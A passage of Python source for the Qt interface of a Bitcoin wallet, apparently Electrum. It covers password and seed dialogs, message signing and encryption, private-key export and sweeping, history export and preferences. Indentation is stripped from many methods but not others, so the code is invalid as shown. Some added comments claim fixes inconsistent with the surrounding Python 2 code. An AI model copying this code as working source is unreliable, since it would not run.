sb.addPermanentWidget(StatusBarButton(QIcon(":icons/preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(QIcon(":icons/seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(QIcon(":icons/status_disconnected.png"), _("Network"), self.run_network_dialog )
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = QIcon(":icons/lock.png") if self.wallet.use_encryption else QIcon(":icons/unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.can_change_password())
self.set_send_button_text()
def change_password_dialog(self):
from password_dialog import PasswordDialog, PW_CHANGE
msg = (_('Your wallet is encrypted. Use this dialog to change your '
'password. To disable wallet encryption, enter an empty new '
'password.') if self.wallet.use_encryption
else _('Your wallet keys are not encrypted'))
d = PasswordDialog(self, self.wallet, msg, PW_CHANGE)
ok, password, new_password = d.run()
if not ok:
return
try:
self.wallet.check_password(password)
except BaseException as e:
self.show_error(str(e))
return
try:
self.wallet.update_password(password, new_password)
except:
traceback.print_exc(file=sys.stdout)
self.show_error(_('Failed to update password'))
return
if new_password:
msg = _('Password was updated successfully')
else:
msg = _('This wallet is not encrypted')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
i = self.tabs.currentIndex()
if i == 0:
self.history_list.filter(t, [2, 3, 4]) # Date, Description, Amount
elif i == 1:
self.invoices_list.filter(t, [0, 1, 2, 3]) # Date, Requestor, Description, Amount
elif i == 2:
self.receive_list.filter(t, [0, 1, 2, 3, 4]) # Date, Account, Address, Description, Amount
elif i == 3:
self.address_list.filter(t, [0,1, 2]) # Address, Label, Balance
elif i == 4:
self.contacts_list.filter(t, [0, 1]) # Key, Value
    def new_contact_dialog(self):
        # Modal dialog to create a contact; on success, jump to the
        # Contacts tab (index 4).
        d = WindowModalDialog(self, _("New Contact"))
        vbox = QVBoxLayout(d)
        vbox.addWidget(QLabel(_('New Contact') + ':'))
        grid = QGridLayout()
        # line1 holds the address, line2 the display name.
        line1 = QLineEdit()
        line1.setFixedWidth(280)
        line2 = QLineEdit()
        line2.setFixedWidth(280)
        grid.addWidget(QLabel(_("Address")), 1, 0)
        grid.addWidget(line1, 1, 1)
        grid.addWidget(QLabel(_("Name")), 2, 0)
        grid.addWidget(line2, 2, 1)
        vbox.addLayout(grid)
        vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
        if not d.exec_():
            return
        # set_contact(label=name, address) validates the address itself.
        if self.set_contact(unicode(line2.text()), str(line1.text())):
            self.tabs.setCurrentIndex(4)
def update_new_account_menu(self):
self.new_account_menu.setVisible(self.wallet.can_create_accounts())
self.new_account_menu.setEnabled(self.wallet.permit_account_naming())
self.update_account_selector()
    def new_account_dialog(self):
        # Prompt for a name for the most recently created account and, on
        # accept, label it and switch to the Addresses tab (index 3).
        dialog = WindowModalDialog(self, _("New Account Name"))
        vbox = QVBoxLayout()
        msg = _("Enter a name to give the account. You will not be "
                "permitted to create further accounts until the new account "
                "receives at least one transaction.") + "\n"
        label = QLabel(msg)
        label.setWordWrap(True)
        vbox.addWidget(label)
        e = QLineEdit()
        vbox.addWidget(e)
        vbox.addLayout(Buttons(CancelButton(dialog), OkButton(dialog)))
        dialog.setLayout(vbox)
        if dialog.exec_():
            # Labels the wallet's newest account id with the entered name.
            self.wallet.set_label(self.wallet.last_account_id(), str(e.text()))
            self.address_list.update()
            self.tabs.setCurrentIndex(3)
            self.update_new_account_menu()
def check_next_account(self):
if self.wallet.needs_next_account() and not self.checking_accounts:
self.checking_accounts = True
msg = _("All the accounts in your wallet have received "
"transactions. Electrum must check whether more "
"accounts exist; one will only be shown if "
"it has been used or you give it a name.")
self.show_message(msg, title=_("Check Accounts"))
self.create_next_account()
    @protected
    def create_next_account(self, password):
        # Derive the next account on the wallet thread (password-gated via
        # @protected); clears the 'checking' flag set by check_next_account.
        def on_done():
            self.checking_accounts = False
            self.update_new_account_menu()
        task = partial(self.wallet.create_next_account, password)
        self.wallet.thread.add(task, on_done=on_done)
def show_master_public_keys(self):
dialog = WindowModalDialog(self, "Master Public Keys")
mpk_dict = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(100)
mpk_text.addCopyButton(self.app)
sorted_keys = sorted(mpk_dict.keys())
def show_mpk(index):
mpk_text.setText(mpk_dict[sorted_keys[index]])
# only show the combobox in case multiple accounts are available
if len(mpk_dict) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
is_mine = self.wallet.master_private_keys.has_key(key)
mine_text = [_("cosigner"), _("self")]
return "%s (%s)" % (key, mine_text[is_mine])
return key
labels = list(map(label, sorted_keys))
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels,
on_click)
vbox.addLayout(labels_clayout.layout())
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
    @protected
    def show_seed_dialog(self, password):
        # Display the wallet's mnemonic seed; password-gated via @protected.
        if self.wallet.use_encryption and password is None:
            return # User cancelled password input
        if not self.wallet.has_seed():
            self.show_message(_('This wallet has no seed'))
            return
        try:
            mnemonic = self.wallet.get_mnemonic(password)
        except BaseException as e:
            self.show_error(str(e))
            return
        from seed_dialog import SeedDialog
        d = SeedDialog(self, mnemonic, self.wallet.has_imported_keys())
        d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
    def show_public_keys(self, address):
        # Dialog listing the public key(s) behind *address*.
        if not address: return
        try:
            pubkey_list = self.wallet.get_public_keys(address)
        except Exception as e:
            traceback.print_exc(file=sys.stdout)
            self.show_message(str(e))
            return
        d = WindowModalDialog(self, _("Public key"))
        d.setMinimumSize(600, 200)
        vbox = QVBoxLayout()
        vbox.addWidget( QLabel(_("Address") + ': ' + address))
        if isinstance(self.wallet, BIP32_RD_Wallet):
            # Deterministic wallets can also show the derivation path.
            derivation = self.wallet.address_id(address)
            vbox.addWidget(QLabel(_("Derivation") + ': ' + derivation))
        vbox.addWidget(QLabel(_("Public key") + ':'))
        keys_e = ShowQRTextEdit(text='\n'.join(pubkey_list))
        keys_e.addCopyButton(self.app)
        vbox.addWidget(keys_e)
        vbox.addLayout(Buttons(CloseButton(d)))
        d.setLayout(vbox)
        d.exec_()
    @protected
    def show_private_key(self, address, password):
        # Dialog listing the private key(s) for *address*; password-gated
        # via @protected.
        if not address: return
        try:
            pk_list = self.wallet.get_private_key(address, password)
        except Exception as e:
            traceback.print_exc(file=sys.stdout)
            self.show_message(str(e))
            return
        d = WindowModalDialog(self, _("Private key"))
        d.setMinimumSize(600, 200)
        vbox = QVBoxLayout()
        vbox.addWidget( QLabel(_("Address") + ': ' + address))
        vbox.addWidget( QLabel(_("Private key") + ':'))
        keys_e = ShowQRTextEdit(text='\n'.join(pk_list))
        keys_e.addCopyButton(self.app)
        vbox.addWidget(keys_e)
        vbox.addLayout(Buttons(CloseButton(d)))
        d.setLayout(vbox)
        d.exec_()
    @protected
    def do_sign(self, address, message, signature, password):
        # Sign the message widget's text with *address*'s key on the wallet
        # thread; the base64 signature is written into the signature widget.
        message = unicode(message.toPlainText()).encode('utf-8')
        task = partial(self.wallet.sign_message, str(address.text()),
                       message, password)
        def show_signed_message(sig):
            signature.setText(base64.b64encode(sig))
        self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
message = unicode(message.toPlainText())
message = message.encode('utf-8')
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = bitcoin.verify_message(address.text(), sig, message)
except:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
    """Open the modal sign/verify-message dialog, pre-filled with *address*."""
    d = WindowModalDialog(self, _('Sign/verify Message'))
    d.setMinimumSize(410, 290)
    layout = QGridLayout(d)
    message_e = QTextEdit()
    layout.addWidget(QLabel(_('Message')), 1, 0)
    layout.addWidget(message_e, 1, 1)
    layout.setRowStretch(2,3)
    address_e = QLineEdit()
    address_e.setText(address)
    layout.addWidget(QLabel(_('Address')), 2, 0)
    layout.addWidget(address_e, 2, 1)
    signature_e = QTextEdit()
    layout.addWidget(QLabel(_('Signature')), 3, 0)
    layout.addWidget(signature_e, 3, 1)
    layout.setRowStretch(3,1)
    hbox = QHBoxLayout()
    b = QPushButton(_("Sign"))
    # Sign/Verify delegate to do_sign/do_verify with the dialog's widgets.
    b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
    hbox.addWidget(b)
    b = QPushButton(_("Verify"))
    b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
    hbox.addWidget(b)
    b = QPushButton(_("Close"))
    b.clicked.connect(d.accept)
    hbox.addWidget(b)
    layout.addLayout(hbox, 4, 1)
    d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
    """Decrypt the ciphertext from *encrypted_e* into *message_e*.

    @protected supplies *password*.  Decryption runs on the wallet's
    worker thread; on success the plaintext is written via setText.
    """
    cyphertext = str(encrypted_e.toPlainText())
    task = partial(self.wallet.decrypt_message, str(pubkey_e.text()),
                   cyphertext, password)
    self.wallet.thread.add(task, on_success=message_e.setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
    """Encrypt the text from *message_e* to the public key in *pubkey_e*.

    The result is written into *encrypted_e*; failures are shown to the
    user and logged to stdout.
    """
    message = unicode(message_e.toPlainText())
    message = message.encode('utf-8')
    try:
        encrypted = bitcoin.encrypt_message(message, str(pubkey_e.text()))
        encrypted_e.setText(encrypted)
    except BaseException as e:
        traceback.print_exc(file=sys.stdout)
        self.show_warning(str(e))
def encrypt_message(self, address = ''):
    """Open the modal encrypt/decrypt-message dialog.

    When *address* is given, its first public key pre-fills the key field.
    """
    d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
    d.setMinimumSize(610, 490)
    layout = QGridLayout(d)
    message_e = QTextEdit()
    layout.addWidget(QLabel(_('Message')), 1, 0)
    layout.addWidget(message_e, 1, 1)
    layout.setRowStretch(2,3)
    pubkey_e = QLineEdit()
    if address:
        pubkey = self.wallet.get_public_keys(address)[0]
        pubkey_e.setText(pubkey)
    layout.addWidget(QLabel(_('Public key')), 2, 0)
    layout.addWidget(pubkey_e, 2, 1)
    encrypted_e = QTextEdit()
    layout.addWidget(QLabel(_('Encrypted')), 3, 0)
    layout.addWidget(encrypted_e, 3, 1)
    layout.setRowStretch(3,1)
    hbox = QHBoxLayout()
    b = QPushButton(_("Encrypt"))
    b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
    hbox.addWidget(b)
    b = QPushButton(_("Decrypt"))
    b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
    hbox.addWidget(b)
    b = QPushButton(_("Close"))
    b.clicked.connect(d.accept)
    hbox.addWidget(b)
    layout.addLayout(hbox, 4, 1)
    d.exec_()
def password_dialog(self, msg=None, parent=None):
    """Prompt for the wallet password.

    Returns the entered password as unicode, or None if cancelled.
    *msg* overrides the default prompt text.
    """
    parent = parent or self
    d = WindowModalDialog(parent, _("Enter Password"))
    pw = QLineEdit()
    # 2 == QLineEdit.Password: mask the typed characters.
    pw.setEchoMode(2)
    vbox = QVBoxLayout()
    if not msg:
        msg = _('Please enter your password')
    vbox.addWidget(QLabel(msg))
    grid = QGridLayout()
    grid.setSpacing(8)
    grid.addWidget(QLabel(_('Password')), 1, 0)
    grid.addWidget(pw, 1, 1)
    vbox.addLayout(grid)
    vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
    d.setLayout(vbox)
    # Plugins (e.g. virtual keyboard) may extend the dialog here.
    run_hook('password_dialog', pw, grid, 1)
    if not d.exec_(): return
    return unicode(pw.text())
def tx_from_text(self, txt):
    """Parse raw transaction text into a Transaction object.

    Returns None (after informing the user) when the text cannot be
    parsed.
    """
    from electrum.transaction import tx_from_str, Transaction
    try:
        tx = tx_from_str(txt)
        return Transaction(tx)
    except Exception:
        # Narrowed from a bare ``except:`` so KeyboardInterrupt/SystemExit
        # are not swallowed; any parse failure is reported to the user.
        traceback.print_exc(file=sys.stdout)
        self.show_critical(_("Electrum was unable to parse your transaction"))
        return
def read_tx_from_qrcode(self):
    """Scan a QR code and act on its contents.

    A ``bitcoin:`` URI is routed to the payment flow; anything else is
    treated as a base43-encoded offline-signed transaction and displayed.
    """
    from electrum import qrscanner
    try:
        data = qrscanner.scan_qr(self.config)
    except BaseException as e:
        self.show_error(str(e))
        return
    if not data:
        return
    # if the user scanned a bitcoin URI
    if data.startswith("bitcoin:"):
        self.pay_to_URI(data)
        return
    # else if the user scanned an offline signed tx
    # transactions are binary, but qrcode seems to return utf8...
    data = data.decode('utf8')
    z = bitcoin.base_decode(data, length=None, base=43)
    # Re-pack the decoded bytes and hex-encode them for tx_from_text.
    data = ''.join(chr(ord(b)) for b in z).encode('hex')
    tx = self.tx_from_text(data)
    if not tx:
        return
    self.show_transaction(tx)
def read_tx_from_file(self):
    """Read a .txn file chosen by the user and parse it into a transaction.

    Returns the parsed Transaction, or None if the user cancels or the
    file cannot be read.
    """
    fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
    if not fileName:
        return
    try:
        with open(fileName, "r") as f:
            file_content = f.read()
    except (ValueError, IOError, os.error) as reason:
        self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
        # Fix: without this return the code fell through to tx_from_text
        # with ``file_content`` unbound, raising NameError after the error
        # dialog.
        return
    return self.tx_from_text(file_content)
def do_process_from_text(self):
    """Ask the user for a raw transaction, parse it, and show it."""
    raw = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
    if not raw:
        return
    parsed = self.tx_from_text(raw)
    if parsed:
        self.show_transaction(parsed)
def do_process_from_file(self):
    """Load a transaction from a file and display it when parsing succeeds."""
    loaded = self.read_tx_from_file()
    if loaded:
        self.show_transaction(loaded)
def do_process_from_txid(self):
    """Fetch a transaction by txid from the server and display it."""
    from electrum import transaction
    txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
    if ok and txid:
        txid = str(txid).strip()
        try:
            # Blocking request to the Electrum server for the raw tx.
            r = self.network.synchronous_get(('blockchain.transaction.get',[txid]))
        except BaseException as e:
            self.show_message(str(e))
            return
        tx = transaction.Transaction(r)
        self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
    """Export every private key of the wallet to a file chosen by the user.

    Key derivation happens on a background thread; progress and the final
    key list are pushed to the dialog via Qt signals.  @protected supplies
    *password*.
    """
    if self.wallet.is_watching_only():
        self.show_message(_("This is a watching-only wallet"))
        return
    try:
        self.wallet.check_password(password)
    except Exception as e:
        self.show_error(str(e))
        return
    d = WindowModalDialog(self, _('Private keys'))
    d.setMinimumSize(850, 300)
    vbox = QVBoxLayout(d)
    msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
                          _("Exposing a single private key can compromise your entire wallet!"),
                          _("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
    vbox.addWidget(QLabel(msg))
    e = QTextEdit()
    e.setReadOnly(True)
    vbox.addWidget(e)
    defaultname = 'electrum-private-keys.csv'
    select_msg = _('Select file to export your private keys to')
    hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
    vbox.addLayout(hbox)
    b = OkButton(d, _('Export'))
    # Export stays disabled until all keys have been computed.
    b.setEnabled(False)
    vbox.addLayout(Buttons(CancelButton(d), b))
    private_keys = {}
    addresses = self.wallet.addresses(True)
    # Flag read by the worker thread; set when the dialog is cancelled.
    done = False
    def privkeys_thread():
        for addr in addresses:
            time.sleep(0.1)
            if done:
                break
            private_keys[addr] = "\n".join(self.wallet.get_private_key(addr, password))
            d.emit(SIGNAL('computing_privkeys'))
        d.emit(SIGNAL('show_privkeys'))
    def show_privkeys():
        s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
        e.setText(s)
        b.setEnabled(True)
    d.connect(d, QtCore.SIGNAL('computing_privkeys'), lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
    d.connect(d, QtCore.SIGNAL('show_privkeys'), show_privkeys)
    threading.Thread(target=privkeys_thread).start()
    if not d.exec_():
        # Dialog cancelled: tell the worker thread to stop.
        done = True
        return
    filename = filename_e.text()
    if not filename:
        return
    try:
        self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
    except (IOError, os.error) as reason:
        txt = "\n".join([
            _("Electrum was unable to produce a private key-export."),
            str(reason)
        ])
        self.show_critical(txt, title=_("Unable to create csv"))
    except Exception as e:
        self.show_message(str(e))
        return
    self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
    """Write the {address: private_key} mapping *pklist* to *fileName*.

    CSV format when *is_csv* is true, pretty-printed JSON otherwise.
    Raises IOError/OSError to the caller on write failure.
    """
    with open(fileName, "w+") as f:
        if is_csv:
            # lineterminator='\n' keeps the output consistent with
            # do_export_history (the csv default would emit '\r\n' rows).
            writer = csv.writer(f, lineterminator='\n')
            writer.writerow(["address", "private_key"])
            for addr, pk in pklist.items():
                # Addresses are right-aligned to a fixed 34-char column.
                writer.writerow(["%34s" % addr, pk])
        else:
            import json
            f.write(json.dumps(pklist, indent=4))
def do_import_labels(self):
    """Import wallet labels from a user-selected JSON file."""
    labelsFile = self.getOpenFileName(_("Open labels file"), "*.json")
    if not labelsFile: return
    try:
        # 'with' guarantees the handle is closed even when json.loads or
        # set_label raises (the original open/read/close leaked it on error).
        with open(labelsFile, 'r') as f:
            data = f.read()
        for key, value in json.loads(data).items():
            self.wallet.set_label(key, value)
        self.show_message(_("Your labels were imported from") + " '%s'" % str(labelsFile))
    except (IOError, os.error) as reason:
        self.show_critical(_("Electrum was unable to import your labels.") + "\n" + str(reason))
def do_export_labels(self):
    """Export all wallet labels to a user-selected JSON file."""
    labels = self.wallet.labels
    try:
        fileName = self.getSaveFileName(_("Select file to save your labels"), 'electrum_labels.json', "*.json")
        if fileName:
            with open(fileName, 'w+') as f:
                json.dump(labels, f, indent=4, sort_keys=True)
            # Fix: message typo "where exported" -> "were exported".
            self.show_message(_("Your labels were exported to") + " '%s'" % str(fileName))
    except (IOError, os.error) as reason:
        # Modern ``except ... as`` syntax, consistent with the rest of the
        # file (the old comma form is a SyntaxError in Python 3).
        self.show_critical(_("Electrum was unable to export your labels.") + "\n" + str(reason))
def export_history_dialog(self):
    """Ask for a target file and export the wallet history to it."""
    d = WindowModalDialog(self, _('Export History'))
    d.setMinimumSize(400, 200)
    vbox = QVBoxLayout(d)
    defaultname = os.path.expanduser('~/electrum-history.csv')
    select_msg = _('Select file to export your wallet transactions to')
    hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
    vbox.addLayout(hbox)
    vbox.addStretch(1)
    hbox = Buttons(CancelButton(d), OkButton(d, _('Export')))
    vbox.addLayout(hbox)
    # Plugins may add widgets to the button row.
    run_hook('export_history_dialog', self, hbox)
    self.update()
    if not d.exec_():
        return
    filename = filename_e.text()
    if not filename:
        return
    try:
        self.do_export_history(self.wallet, filename, csv_button.isChecked())
    except (IOError, os.error) as reason:
        # Modern ``except ... as`` syntax, consistent with the rest of the
        # file (the old comma form is a SyntaxError in Python 3).
        export_error_label = _("Electrum was unable to produce a transaction export.")
        self.show_critical(export_error_label + "\n" + str(reason), title=_("Unable to export history"))
        return
    self.show_message(_("Your wallet history has been successfully exported."))
def do_export_history(self, wallet, fileName, is_csv):
    """Write the wallet's transaction history to *fileName*.

    CSV rows when *is_csv* is true, a JSON array of objects otherwise.
    """
    history = wallet.get_history()
    lines = []
    for item in history:
        tx_hash, confirmations, value, timestamp, balance = item
        # Unconfirmed txs have no usable timestamp.
        if confirmations:
            if timestamp is not None:
                time_string = format_time(timestamp)
            else:
                time_string = "unknown"
        else:
            time_string = "unconfirmed"
        if value is not None:
            value_string = format_satoshis(value, True)
        else:
            value_string = '--'
        if tx_hash:
            label = wallet.get_label(tx_hash)
            label = label.encode('utf-8')
        else:
            label = ""
        if is_csv:
            lines.append([tx_hash, label, confirmations, value_string, time_string])
        else:
            lines.append({'txid':tx_hash, 'date':"%16s"%time_string, 'label':label, 'value':value_string})
    with open(fileName, "w+") as f:
        if is_csv:
            transaction = csv.writer(f, lineterminator='\n')
            transaction.writerow(["transaction_hash","label", "confirmations", "value", "timestamp"])
            for line in lines:
                transaction.writerow(line)
        else:
            import json
            f.write(json.dumps(lines, indent = 4))
def sweep_key_dialog(self):
    """Sweep the funds of externally-held private keys into this wallet.

    The Sweep button stays disabled until both a valid destination address
    and valid private key text are present.
    """
    d = WindowModalDialog(self, title=_('Sweep private keys'))
    d.setMinimumSize(600, 300)
    vbox = QVBoxLayout(d)
    vbox.addWidget(QLabel(_("Enter private keys:")))
    keys_e = QTextEdit()
    keys_e.setTabChangesFocus(True)
    vbox.addWidget(keys_e)
    addresses = self.wallet.get_unused_addresses(self.current_account)
    h, address_e = address_field(addresses)
    vbox.addLayout(h)
    vbox.addStretch(1)
    button = OkButton(d, _('Sweep'))
    vbox.addLayout(Buttons(CancelButton(d), button))
    button.setEnabled(False)
    def get_address():
        # Returns the destination address, or None when invalid.
        addr = str(address_e.text())
        if bitcoin.is_address(addr):
            return addr
    def get_pk():
        # Returns the list of private keys, or None when invalid.
        pk = str(keys_e.toPlainText()).strip()
        if Wallet.is_private_key(pk):
            return pk.split()
    f = lambda: button.setEnabled(get_address() is not None and get_pk() is not None)
    keys_e.textChanged.connect(f)
    address_e.textChanged.connect(f)
    if not d.exec_():
        return
    fee = self.wallet.fee_per_kb(self.config)
    tx = Transaction.sweep(get_pk(), self.network, get_address(), fee)
    if not tx:
        self.show_message(_('No inputs found. (Note that inputs need to be confirmed)'))
        return
    self.warn_if_watching_only()
    self.show_transaction(tx)
@protected
def do_import_privkey(self, password):
    """Import one or more private keys typed by the user into the wallet.

    Warns first-time importers that such keys are not covered by the seed.
    @protected supplies *password*.
    """
    if not self.wallet.has_imported_keys():
        if not self.question('<b>'+_('Warning') +':\n</b><br/>'+ _('Imported keys are not recoverable from seed.') + ' ' \
                             + _('If you ever need to restore your wallet from its seed, these keys will be lost.') + '<p>' \
                             + _('Are you sure you understand what you are doing?'), title=_('Warning')):
            return
    text = text_dialog(self, _('Import private keys'), _("Enter private keys")+':', _("Import"))
    if not text: return
    text = str(text).split()
    badkeys = []
    addrlist = []
    for key in text:
        try:
            addr = self.wallet.import_key(key, password)
        except Exception as e:
            badkeys.append(key)
            continue
        if not addr:
            badkeys.append(key)
        else:
            addrlist.append(addr)
    # Report successes and failures separately.
    if addrlist:
        self.show_message(_("The following addresses were added") + ':\n' + '\n'.join(addrlist))
    if badkeys:
        self.show_critical(_("The following inputs could not be imported") + ':\n'+ '\n'.join(badkeys))
    self.address_list.update()
    self.history_list.update()
def settings_dialog(self):
    """Build and run the modal Preferences dialog.

    Widgets are collected per-tab in gui_widgets / tx_widgets / id_widgets
    and laid out in a grid at the end.  Each setting writes straight to
    self.config (or the wallet) from its own closure callback.
    """
    self.need_restart = False
    d = WindowModalDialog(self, _('Preferences'))
    vbox = QVBoxLayout()
    tabs = QTabWidget()
    gui_widgets = []
    tx_widgets = []
    id_widgets = []
    # language
    lang_help = _('Select which language is used in the GUI (after restart).')
    lang_label = HelpLabel(_('Language') + ':', lang_help)
    lang_combo = QComboBox()
    from electrum.i18n import languages
    lang_combo.addItems(languages.values())
    try:
        index = languages.keys().index(self.config.get("language",''))
    except Exception:
        index = 0
    lang_combo.setCurrentIndex(index)
    if not self.config.is_modifiable('language'):
        for w in [lang_combo, lang_label]: w.setEnabled(False)
    def on_lang(x):
        lang_request = languages.keys()[lang_combo.currentIndex()]
        if lang_request != self.config.get('language'):
            self.config.set_key("language", lang_request, True)
            # Language changes only take effect after a restart.
            self.need_restart = True
    lang_combo.currentIndexChanged.connect(on_lang)
    gui_widgets.append((lang_label, lang_combo))
    # number of decimal zeros shown for amounts
    nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
    nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
    nz = QSpinBox()
    nz.setMinimum(0)
    nz.setMaximum(self.decimal_point)
    nz.setValue(self.num_zeros)
    if not self.config.is_modifiable('num_zeros'):
        for w in [nz, nz_label]: w.setEnabled(False)
    def on_nz():
        value = nz.value()
        if self.num_zeros != value:
            self.num_zeros = value
            self.config.set_key('num_zeros', value, True)
            self.history_list.update()
            self.address_list.update()
    nz.valueChanged.connect(on_nz)
    gui_widgets.append((nz_label, nz))
    # static fee per kb (only editable when dynamic fees are off)
    msg = '\n'.join([
        _('Fee per kilobyte of transaction.')
    ])
    fee_label = HelpLabel(_('Transaction fee per kb') + ':', msg)
    fee_e = BTCkBEdit(self.get_decimal_point)
    def on_fee(is_done):
        if self.config.get('dynamic_fees'):
            return
        v = fee_e.get_amount() or 0
        self.config.set_key('fee_per_kb', v, is_done)
        self.update_fee()
    fee_e.editingFinished.connect(lambda: on_fee(True))
    fee_e.textEdited.connect(lambda: on_fee(False))
    tx_widgets.append((fee_label, fee_e))
    # dynamic fees checkbox + multiplier slider
    dynfee_cb = QCheckBox(_('Dynamic fees'))
    dynfee_cb.setChecked(self.config.get('dynamic_fees', False))
    dynfee_cb.setToolTip(_("Use a fee per kB value recommended by the server."))
    dynfee_sl = QSlider(Qt.Horizontal, self)
    # The pref is from 0 to 100; add 50 to get the factor from 50% to 150%
    dynfee_sl.setRange(0, 100)
    dynfee_sl.setTickInterval(10)
    dynfee_sl.setTickPosition(QSlider.TicksBelow)
    dynfee_sl.setValue(self.config.get('fee_factor', 50))
    dynfee_sl.setToolTip("Min = 50%, Max = 150%")
    multiplier_label = HelpLabel("", _("Multiply the recommended fee/kb value by a constant factor. Min = 50%, Max = 150%"))
    tx_widgets.append((dynfee_cb, dynfee_sl))
    tx_widgets.append((None, multiplier_label))
    def update_feeperkb():
        # Sync the fee widgets with the current dynamic/static mode.
        fee_e.setAmount(self.wallet.fee_per_kb(self.config))
        b = self.config.get('dynamic_fees', False)
        dynfee_sl.setEnabled(b)
        multiplier_label.setEnabled(b)
        fee_e.setEnabled(not b)
    def slider_moved():
        multiplier_label.setText(_('Fee multiplier: %3d%%')
                                 % (dynfee_sl.sliderPosition() + 50))
    def slider_released():
        self.config.set_key('fee_factor', dynfee_sl.sliderPosition(), False)
        update_feeperkb()
    def on_dynfee(x):
        dynfee = x == Qt.Checked
        self.config.set_key('dynamic_fees', dynfee)
        update_feeperkb()
    dynfee_cb.stateChanged.connect(on_dynfee)
    dynfee_sl.valueChanged.connect(slider_moved)
    dynfee_sl.sliderReleased.connect(slider_released)
    update_feeperkb()
    slider_moved()
    # OpenAlias identity
    msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
          + _('The following alias providers are available:') + '\n'\
          + '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
          + 'For more information, see http://openalias.org'
    alias_label = HelpLabel(_('OpenAlias') + ':', msg)
    alias = self.config.get('alias','')
    alias_e = QLineEdit(alias)
    def set_alias_color():
        # Green = validated alias, red = failed lookup/validation.
        if not self.config.get('alias'):
            alias_e.setStyleSheet("")
            return
        if self.alias_info:
            alias_addr, alias_name, validated = self.alias_info
            alias_e.setStyleSheet(GREEN_BG if validated else RED_BG)
        else:
            alias_e.setStyleSheet(RED_BG)
    def on_alias_edit():
        alias_e.setStyleSheet("")
        alias = str(alias_e.text())
        self.config.set_key('alias', alias, True)
        if alias:
            self.fetch_alias()
    set_alias_color()
    self.connect(self, SIGNAL('alias_received'), set_alias_color)
    alias_e.editingFinished.connect(on_alias_edit)
    id_widgets.append((alias_label, alias_e))
    # SSL certificate
    msg = ' '.join([
        _('SSL certificate used to sign payment requests.'),
        _('Use setconfig to set ssl_chain and ssl_privkey.'),
    ])
    if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
        try:
            SSL_identity = paymentrequest.check_ssl_config(self.config)
            SSL_error = None
        except BaseException as e:
            SSL_identity = "error"
            SSL_error = str(e)
    else:
        SSL_identity = ""
        SSL_error = None
    SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
    SSL_id_e = QLineEdit(SSL_identity)
    SSL_id_e.setStyleSheet(RED_BG if SSL_error else GREEN_BG if SSL_identity else '')
    if SSL_error:
        SSL_id_e.setToolTip(SSL_error)
    SSL_id_e.setReadOnly(True)
    id_widgets.append((SSL_id_label, SSL_id_e))
    # base unit (BTC / mBTC / bits)
    units = ['BTC', 'mBTC', 'bits']
    msg = _('Base unit of your wallet.')\
          + '\n1BTC=1000mBTC.\n' \
          + _(' These settings affects the fields in the Send tab')+' '
    unit_label = HelpLabel(_('Base unit') + ':', msg)
    unit_combo = QComboBox()
    unit_combo.addItems(units)
    unit_combo.setCurrentIndex(units.index(self.base_unit()))
    def on_unit(x):
        unit_result = units[unit_combo.currentIndex()]
        if self.base_unit() == unit_result:
            return
        # Preserve the amounts currently typed in the edits across the
        # decimal-point change.
        edits = self.amount_e, self.fee_e, self.receive_amount_e, fee_e
        amounts = [edit.get_amount() for edit in edits]
        if unit_result == 'BTC':
            self.decimal_point = 8
        elif unit_result == 'mBTC':
